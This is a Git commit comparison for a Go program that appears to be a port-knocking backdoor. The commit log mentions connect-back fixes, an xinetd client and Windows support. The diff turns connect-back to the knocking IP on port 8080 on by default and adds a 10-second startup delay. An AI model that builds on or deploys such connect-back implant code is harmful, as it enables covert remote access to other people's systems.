Compare commits

..

12 Commits

Author SHA1 Message Date
Pin
9c190cf6c0 temp sleep 2023-04-06 21:34:17 -04:00
Pin
2da1dfeb1a default callback true 2023-04-06 20:32:58 -04:00
Pin
963db705d9 changed append to write 2022-04-03 23:28:41 -04:00
Pin
de9feed536 Adapter linux client for xinetd
Signed-off-by: Pin <wf6DJd8a3xSSCZbn@protonmail.com>
2022-04-03 23:28:41 -04:00
Pin
6d101ddd9c adding fork message 2022-04-03 23:28:41 -04:00
Michael Vaughan
e8379e0c66 add linux static target 2022-04-03 23:28:41 -04:00
d3adzo
bb97442081 final updates + readme cleanup 2022-04-03 23:28:41 -04:00
d3adzo
7f3c21d496 connectback condition fail fixed 2022-04-03 23:28:41 -04:00
d3adzo
4c5b302292 fixed 2x TCP issue 2022-04-03 23:28:41 -04:00
d3adzo
3f6d3b3f80 cross compile, now testing 2022-04-03 23:28:41 -04:00
d3adzo
3eb2035d33 added win support, need to fix cmd window syscall error 2022-04-03 23:28:41 -04:00
Pablo Potat0
13f4c70e64 Update README.md 2022-04-03 23:28:41 -04:00

View File

@@ -9,6 +9,7 @@ import (
"os/exec" "os/exec"
"runtime" "runtime"
"strings" "strings"
"time"
"strconv" "strconv"
@@ -63,7 +64,7 @@ func sInit(os string) *targetInfo {
// if true, connect back to knocking // if true, connect back to knocking
// IP on connectbackPort // IP on connectbackPort
tInfo.connectback = false tInfo.connectback = true
// only relevant if connectback is true // only relevant if connectback is true
tInfo.connectbackPort = "8080" tInfo.connectbackPort = "8080"
@@ -71,6 +72,7 @@ func sInit(os string) *targetInfo {
} }
func main() { func main() {
time.Sleep(10 * time.Second)
tInfo := sInit(runtime.GOOS) tInfo := sInit(runtime.GOOS)
// Read package and analze them // Read package and analze them